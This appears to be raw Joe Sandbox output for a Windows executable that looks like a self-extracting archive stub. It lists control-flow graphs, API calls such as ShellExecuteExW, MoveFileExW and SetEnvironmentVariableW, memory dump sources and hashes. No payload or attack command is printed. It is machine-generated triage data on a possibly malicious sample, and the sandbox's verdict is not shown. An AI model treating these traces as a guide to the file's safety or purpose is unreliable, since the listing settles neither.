                                                                                            control_flow_graph 347 a4c73f-a4c757 call a4eb78 call a4ec50 352 a4d40d-a4d418 347->352 353 a4c75d-a4c787 call a4b314 347->353 353->352 356 a4c78d-a4c792 353->356 357 a4c793-a4c7a1 356->357 358 a4c7a2-a4c7b7 call a4af98 357->358 361 a4c7b9 358->361 362 a4c7bb-a4c7d0 call a41fbb 361->362 365 a4c7d2-a4c7d6 362->365 366 a4c7dd-a4c7e0 362->366 365->362 369 a4c7d8 365->369 367 a4c7e6 366->367 368 a4d3d9-a4d404 call a4b314 366->368 370 a4ca7c-a4ca7e 367->370 371 a4c7ed-a4c7f0 367->371 372 a4c9be-a4c9c0 367->372 373 a4ca5f-a4ca61 367->373 368->357 381 a4d40a-a4d40c 368->381 369->368 370->368 378 a4ca84-a4ca8b 370->378 371->368 376 a4c7f6-a4c850 call a4a64d call a3bdf3 call a3a544 call a3a67e call a36edb 371->376 372->368 375 a4c9c6-a4c9d2 372->375 373->368 377 a4ca67-a4ca77 SetWindowTextW 373->377 382 a4c9d4-a4c9e5 call a57686 375->382 383 a4c9e6-a4c9eb 375->383 438 a4c98f-a4c9a4 call a3a5d1 376->438 377->368 378->368 380 a4ca91-a4caaa 378->380 385 a4cab2-a4cac0 call a53e13 380->385 386 a4caac 380->386 381->352 382->383 389 a4c9f5-a4ca00 call a4b48e 383->389 390 a4c9ed-a4c9f3 383->390 385->368 401 a4cac6-a4cacf 385->401 386->385 394 a4ca05-a4ca07 389->394 390->394 399 a4ca12-a4ca32 call a53e13 call a53e3e 394->399 400 a4ca09-a4ca10 call a53e13 394->400 421 a4ca34-a4ca3b 399->421 422 a4ca4b-a4ca4d 399->422 400->399 406 a4cad1-a4cad5 401->406 407 a4caf8-a4cafb 401->407 411 a4cad7-a4cadf 406->411 412 a4cb01-a4cb04 406->412 407->412 414 a4cbe0-a4cbee call a40602 407->414 411->368 417 a4cae5-a4caf3 call a40602 411->417 419 a4cb06-a4cb0b 412->419 420 a4cb11-a4cb2c 412->420 430 a4cbf0-a4cc04 call a5279b 414->430 417->430 419->414 419->420 433 a4cb76-a4cb7d 420->433 434 a4cb2e-a4cb68 420->434 427 a4ca42-a4ca4a call a57686 421->427 428 a4ca3d-a4ca3f 421->428 422->368 429 a4ca53-a4ca5a call a53e2e 422->429 427->422 428->427 429->368 447 a4cc06-a4cc0a 430->447 448 a4cc11-a4cc62 call a40602 
call a4b1be GetDlgItem SetWindowTextW SendMessageW call a53e49 430->448 440 a4cb7f-a4cb97 call a53e13 433->440 441 a4cbab-a4cbce call a53e13 * 2 433->441 467 a4cb6c-a4cb6e 434->467 468 a4cb6a 434->468 454 a4c855-a4c869 SetFileAttributesW 438->454 455 a4c9aa-a4c9b9 call a3a55a 438->455 440->441 460 a4cb99-a4cba6 call a405da 440->460 441->430 474 a4cbd0-a4cbde call a405da 441->474 447->448 453 a4cc0c-a4cc0e 447->453 481 a4cc67-a4cc6b 448->481 453->448 461 a4c90f-a4c91f GetFileAttributesW 454->461 462 a4c86f-a4c8a2 call a3b991 call a3b690 call a53e13 454->462 455->368 460->441 461->438 466 a4c921-a4c930 DeleteFileW 461->466 490 a4c8a4-a4c8b3 call a53e13 462->490 491 a4c8b5-a4c8c3 call a3bdb4 462->491 466->438 475 a4c932-a4c935 466->475 467->433 468->467 474->430 479 a4c939-a4c965 call a34092 GetFileAttributesW 475->479 488 a4c937-a4c938 479->488 489 a4c967-a4c97d MoveFileW 479->489 481->368 485 a4cc71-a4cc85 SendMessageW 481->485 485->368 488->479 489->438 492 a4c97f-a4c989 MoveFileExW 489->492 490->491 497 a4c8c9-a4c908 call a53e13 call a4fff0 490->497 491->455 491->497 492->438 497->461
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 00A4C744
                                                                                              • Part of subcall function 00A4B314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00A4B3FB
                                                                                            • _wcslen.LIBCMT ref: 00A4CA0A
                                                                                            • _wcslen.LIBCMT ref: 00A4CA13
                                                                                            • SetWindowTextW.USER32(?,?), ref: 00A4CA71
                                                                                            • _wcslen.LIBCMT ref: 00A4CAB3
                                                                                            • _wcsrchr.LIBVCRUNTIME ref: 00A4CBFB
                                                                                            • GetDlgItem.USER32(?,00000066), ref: 00A4CC36
                                                                                            • SetWindowTextW.USER32(00000000,?), ref: 00A4CC46
                                                                                            • SendMessageW.USER32(00000000,00000143,00000000,00A7A472), ref: 00A4CC54
                                                                                            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00A4CC7F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                                                                                            • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                                                            • API String ID: 2804936435-312220925
                                                                                            • Opcode ID: 0230cbf42f532f58a2490a14bd183ca0183540cbce94bae503f1505636259583
                                                                                            • Instruction ID: 50341878d0119a7ff363ab42336a945964295e6336ca768ee8bebcdcecd80225
                                                                                            • Opcode Fuzzy Hash: 0230cbf42f532f58a2490a14bd183ca0183540cbce94bae503f1505636259583
                                                                                            • Instruction Fuzzy Hash: 41E16476901218AADF24DBA0DD85EEE73BCEB45350F1080A6FA09E7051EF749F858F60
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 00A3DA70
                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00A3DAAC
                                                                                              • Part of subcall function 00A3C29A: _wcslen.LIBCMT ref: 00A3C2A2
                                                                                              • Part of subcall function 00A405DA: _wcslen.LIBCMT ref: 00A405E0
                                                                                              • Part of subcall function 00A41B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00A3BAE9,00000000,?,?,?,00010426), ref: 00A41BA0
                                                                                            • _wcslen.LIBCMT ref: 00A3DDE9
                                                                                            • __fprintf_l.LIBCMT ref: 00A3DF1C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l
                                                                                            • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
                                                                                            • API String ID: 566448164-801612888
                                                                                            • Opcode ID: 6d7adbad35ae084d6b9f19ab5ccd3885e44aa6aa8bc5659a9827f1c6a07ae847
                                                                                            • Instruction ID: a52f1b54810b6706bf74461c30fc6b09de8bcdeb4a356faee4ca0716b2628cb9
                                                                                            • Opcode Fuzzy Hash: 6d7adbad35ae084d6b9f19ab5ccd3885e44aa6aa8bc5659a9827f1c6a07ae847
                                                                                            • Instruction Fuzzy Hash: 4E32BF72A00218EBCF28EF68D942BEA77B5FF55700F40455AF905AB281EBB1DD85CB50

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                              • Part of subcall function 00A4B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00A4B579
                                                                                              • Part of subcall function 00A4B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00A4B58A
                                                                                              • Part of subcall function 00A4B568: IsDialogMessageW.USER32(00010426,?), ref: 00A4B59E
                                                                                              • Part of subcall function 00A4B568: TranslateMessage.USER32(?), ref: 00A4B5AC
                                                                                              • Part of subcall function 00A4B568: DispatchMessageW.USER32(?), ref: 00A4B5B6
                                                                                            • GetDlgItem.USER32(00000068,00A8FCB8), ref: 00A4D4E8
                                                                                            • ShowWindow.USER32(00000000,00000005,?,?,?,00A4AF07,00000001,?,?,00A4B7B9,00A6506C,00A8FCB8,00A8FCB8,00001000,00000000,00000000), ref: 00A4D510
                                                                                            • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00A4D51B
                                                                                            • SendMessageW.USER32(00000000,000000C2,00000000,00A635F4), ref: 00A4D529
                                                                                            • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00A4D53F
                                                                                            • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00A4D559
                                                                                            • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00A4D59D
                                                                                            • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00A4D5AB
                                                                                            • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00A4D5BA
                                                                                            • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00A4D5E1
                                                                                            • SendMessageW.USER32(00000000,000000C2,00000000,00A643F4), ref: 00A4D5F0
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                                                            • String ID: \
                                                                                            • API String ID: 3569833718-2967466578
                                                                                            • Opcode ID: 8f4ca7a166e39177ae78f31bd2fb2a16100bf9165e06ba0353e79f1d649ea6ca
                                                                                            • Instruction ID: f1a75b24150a6616f6b285312c49f20e99a1cc8008ebbecf2de5940b6a19c148
                                                                                            • Opcode Fuzzy Hash: 8f4ca7a166e39177ae78f31bd2fb2a16100bf9165e06ba0353e79f1d649ea6ca
                                                                                            • Instruction Fuzzy Hash: 7931CF76245352BFE701DF609C4AFAF7FBCEB86708F000509F651961A0DB658A068B76

                                                                                            Control-flow Graph

                                                                                            [Control-flow graph not recovered. First listed block a4d78f-a4d7a7; API calls on its nodes: ShellExecuteExW, ShowWindow, CloseHandle, GetExitCodeProcess.]
                                                                                            APIs
                                                                                            • _wcslen.LIBCMT ref: 00A4D7AE
                                                                                            • ShellExecuteExW.SHELL32(?), ref: 00A4D8DE
                                                                                            • ShowWindow.USER32(?,00000000), ref: 00A4D91D
                                                                                            • GetExitCodeProcess.KERNEL32(?,?), ref: 00A4D959
                                                                                            • CloseHandle.KERNEL32(?), ref: 00A4D97F
                                                                                            • ShowWindow.USER32(?,00000001), ref: 00A4D9E1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
                                                                                            • String ID: .exe$.inf
                                                                                            • API String ID: 36480843-3750412487
                                                                                            • Opcode ID: 641f11c0673518e1a951dc7fbe442e0bba709c9669fee8ec6b2eefdfbdad5880
                                                                                            • Instruction ID: 01360a48174a28e258b0e4a845af3e5e617e19612d737d122623d57b11cb3fff
                                                                                            • Opcode Fuzzy Hash: 641f11c0673518e1a951dc7fbe442e0bba709c9669fee8ec6b2eefdfbdad5880
                                                                                            • Instruction Fuzzy Hash: 1551D379504380AADB31DF649844BBBBBF5AFC1744F04081EF9C5D71A2E7718A85CB62

                                                                                            Control-flow Graph

                                                                                            [Control-flow graph not recovered. First listed block a5a95b-a5a974; API calls on its nodes: MultiByteToWideChar, WideCharToMultiByte.]
                                                                                            APIs
                                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00A55695,00A55695,?,?,?,00A5ABAC,00000001,00000001,2DE85006), ref: 00A5A9B5
                                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00A5ABAC,00000001,00000001,2DE85006,?,?,?), ref: 00A5AA3B
                                                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00A5AB35
                                                                                            • __freea.LIBCMT ref: 00A5AB42
                                                                                              • Part of subcall function 00A58E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00A5CA2C,00000000,?,00A56CBE,?,00000008,?,00A591E0,?,?,?), ref: 00A58E38
                                                                                            • __freea.LIBCMT ref: 00A5AB4B
                                                                                            • __freea.LIBCMT ref: 00A5AB70
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                            • String ID:
                                                                                            • API String ID: 1414292761-0
                                                                                            • Opcode ID: f29a06992dbada16d3e5cfc68dd98b4314f52294d0c2526b9da2417cdd761345
                                                                                            • Instruction ID: 07466a1a4b0e35811d6fb1f219028238b8ab1e9ad1461a75c502aab599cc9330
                                                                                            • Opcode Fuzzy Hash: f29a06992dbada16d3e5cfc68dd98b4314f52294d0c2526b9da2417cdd761345
                                                                                            • Instruction Fuzzy Hash: 1451D072B00216AFDB258F64CD41EABBBABFB64751F164728FD04D6140EB34DC58C692

                                                                                            Control-flow Graph

                                                                                            [Control-flow graph not recovered. First listed block a53b72-a53b7c; API calls on its nodes: LoadLibraryExW, GetLastError, FreeLibrary.]
                                                                                            APIs
                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,00A53C35,?,?,00A92088,00000000,?,00A53D60,00000004,InitializeCriticalSectionEx,00A66394,InitializeCriticalSectionEx,00000000), ref: 00A53C03
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: FreeLibrary
                                                                                            • String ID: api-ms-

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                              • Part of subcall function 00A4081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00A40836
                                                                                              • Part of subcall function 00A4081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00A3F2D8,Crypt32.dll,00000000,00A3F35C,?,?,00A3F33E,?,?,?), ref: 00A40858
                                                                                            • OleInitialize.OLE32(00000000), ref: 00A4AC2F
                                                                                            • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00A4AC66
                                                                                            • SHGetMalloc.SHELL32(00A78438), ref: 00A4AC70
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                                                            • String ID: riched20.dll$3Ro

                                                                                            Control-flow Graph

                                                                                            control_flow_graph 997 a398e0-a39901 call a4ec50 1000 a39903-a39906 997->1000 1001 a3990c 997->1001 1000->1001 1002 a39908-a3990a 1000->1002 1003 a3990e-a3991f 1001->1003 1002->1003 1004 a39921 1003->1004 1005 a39927-a39931 1003->1005 1004->1005 1006 a39933 1005->1006 1007 a39936-a39943 call a36edb 1005->1007 1006->1007 1010 a39945 1007->1010 1011 a3994b-a3996a CreateFileW 1007->1011 1010->1011 1012 a399bb-a399bf 1011->1012 1013 a3996c-a3998e GetLastError call a3bb03 1011->1013 1015 a399c3-a399c6 1012->1015 1018 a399c8-a399cd 1013->1018 1021 a39990-a399b3 CreateFileW GetLastError 1013->1021 1017 a399d9-a399de 1015->1017 1015->1018 1019 a399e0-a399e3 1017->1019 1020 a399ff-a39a10 1017->1020 1018->1017 1022 a399cf 1018->1022 1019->1020 1023 a399e5-a399f9 SetFileTime 1019->1023 1024 a39a12-a39a2a call a40602 1020->1024 1025 a39a2e-a39a39 1020->1025 1021->1015 1026 a399b5-a399b9 1021->1026 1022->1017 1023->1020 1024->1025 1026->1015
                                                                                            APIs
                                                                                            • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00A37760,?,00000005,?,00000011), ref: 00A3995F
                                                                                            • GetLastError.KERNEL32(?,?,00A37760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00A3996C
                                                                                            • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00A37760,?,00000005,?), ref: 00A399A2
                                                                                            • GetLastError.KERNEL32(?,?,00A37760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00A399AA
                                                                                            • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00A37760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00A399F9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: File$CreateErrorLast$Time
                                                                                            • String ID:

                                                                                            Control-flow Graph

                                                                                            control_flow_graph 1056 a4b568-a4b581 PeekMessageW 1057 a4b583-a4b597 GetMessageW 1056->1057 1058 a4b5bc-a4b5be 1056->1058 1059 a4b5a8-a4b5b6 TranslateMessage DispatchMessageW 1057->1059 1060 a4b599-a4b5a6 IsDialogMessageW 1057->1060 1059->1058 1060->1058 1060->1059
                                                                                            APIs
                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00A4B579
                                                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00A4B58A
                                                                                            • IsDialogMessageW.USER32(00010426,?), ref: 00A4B59E
                                                                                            • TranslateMessage.USER32(?), ref: 00A4B5AC
                                                                                            • DispatchMessageW.USER32(?), ref: 00A4B5B6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: Message$DialogDispatchPeekTranslate
                                                                                            • String ID:

                                                                                            Control-flow Graph

                                                                                            control_flow_graph 1061 a4abab-a4abca GetClassNameW 1062 a4abf2-a4abf4 1061->1062 1063 a4abcc-a4abe1 call a41fbb 1061->1063 1065 a4abf6-a4abf9 SHAutoComplete 1062->1065 1066 a4abff-a4ac01 1062->1066 1068 a4abf1 1063->1068 1069 a4abe3-a4abef FindWindowExW 1063->1069 1065->1066 1068->1062 1069->1068
                                                                                            APIs
                                                                                            • GetClassNameW.USER32(?,?,00000050), ref: 00A4ABC2
                                                                                            • SHAutoComplete.SHLWAPI(?,00000010), ref: 00A4ABF9
                                                                                              • Part of subcall function 00A41FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00A3C116,00000000,.exe,?,?,00000800,?,?,?,00A48E3C), ref: 00A41FD1
                                                                                            • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00A4ABE9
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                            • String ID: EDIT

                                                                                            Control-flow Graph

                                                                                            control_flow_graph 1070 a4dbde-a4dc09 call a4ec50 SetEnvironmentVariableW call a40371 1074 a4dc0e-a4dc12 1070->1074 1075 a4dc14-a4dc18 1074->1075 1076 a4dc36-a4dc38 1074->1076 1077 a4dc21-a4dc28 call a4048d 1075->1077 1080 a4dc1a-a4dc20 1077->1080 1081 a4dc2a-a4dc30 SetEnvironmentVariableW 1077->1081 1080->1077 1081->1076
                                                                                            APIs
                                                                                            • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00A4DBF4
                                                                                            • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00A4DC30
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: EnvironmentVariable
                                                                                            • String ID: sfxcmd$sfxpar

                                                                                            Control-flow Graph

                                                                                            control_flow_graph 1082 a39785-a39791 1083 a39793-a3979b GetStdHandle 1082->1083 1084 a3979e-a397b5 ReadFile 1082->1084 1083->1084 1085 a39811 1084->1085 1086 a397b7-a397c0 call a398bc 1084->1086 1087 a39814-a39817 1085->1087 1090 a397c2-a397ca 1086->1090 1091 a397d9-a397dd 1086->1091 1090->1091 1094 a397cc 1090->1094 1092 a397df-a397e8 GetLastError 1091->1092 1093 a397ee-a397f2 1091->1093 1092->1093 1095 a397ea-a397ec 1092->1095 1096 a397f4-a397fc 1093->1096 1097 a3980c-a3980f 1093->1097 1098 a397cd-a397d7 call a39785 1094->1098 1095->1087 1096->1097 1099 a397fe-a39807 GetLastError 1096->1099 1097->1087 1098->1087 1099->1097 1102 a39809-a3980a 1099->1102 1102->1098
                                                                                            APIs
                                                                                            • GetStdHandle.KERNEL32(000000F6), ref: 00A39795
                                                                                            • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 00A397AD
                                                                                            • GetLastError.KERNEL32 ref: 00A397DF
                                                                                            • GetLastError.KERNEL32 ref: 00A397FE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$FileHandleRead
                                                                                            • String ID:
                                                                                            APIs
                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00A53F73,00000000,00000000,?,00A5ACDB,00A53F73,00000000,00000000,00000000,?,00A5AED8,00000006,FlsSetValue), ref: 00A5AD66
                                                                                            • GetLastError.KERNEL32(?,00A5ACDB,00A53F73,00000000,00000000,00000000,?,00A5AED8,00000006,FlsSetValue,00A67970,FlsSetValue,00000000,00000364,?,00A598B7), ref: 00A5AD72
                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00A5ACDB,00A53F73,00000000,00000000,00000000,?,00A5AED8,00000006,FlsSetValue,00A67970,FlsSetValue,00000000), ref: 00A5AD80
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: LibraryLoad$ErrorLast
                                                                                            • String ID:
                                                                                            APIs
                                                                                            • GetStdHandle.KERNEL32(000000F5,?,?,?,?,00A3D343,00000001,?,?,?,00000000,00A4551D,?,?,?), ref: 00A39F9E
                                                                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,00A4551D,?,?,?,?,?,00A44FC7,?), ref: 00A39FE5
                                                                                            • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,00A3D343,00000001,?,?), ref: 00A3A011
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileWrite$Handle
                                                                                            • String ID:
                                                                                            • API String ID: 4209713984-0
                                                                                            • Opcode ID: 4885c3846e76ed51d121de9c250a54f26d4f19a6727f64d0aa9c1e333a74b052
                                                                                            • Instruction ID: 512f177ef0da2664a6c3a69be25175ea57b31c8b8e1e873bc50b89c28ee92576
                                                                                            • Opcode Fuzzy Hash: 4885c3846e76ed51d121de9c250a54f26d4f19a6727f64d0aa9c1e333a74b052
                                                                                            • Instruction Fuzzy Hash: 2F31DF31208315AFDB18CF20D818BAFB7A5FF95711F00491DF8829B290C7B5AD49CBA2
                                                                                            APIs
                                                                                              • Part of subcall function 00A3C27E: _wcslen.LIBCMT ref: 00A3C284
                                                                                            • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00A3A175,?,00000001,00000000,?,?), ref: 00A3A2D9
                                                                                            • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00A3A175,?,00000001,00000000,?,?), ref: 00A3A30C
                                                                                            • GetLastError.KERNEL32(?,?,?,?,00A3A175,?,00000001,00000000,?,?), ref: 00A3A329
                                                                                            Memory Dump Source
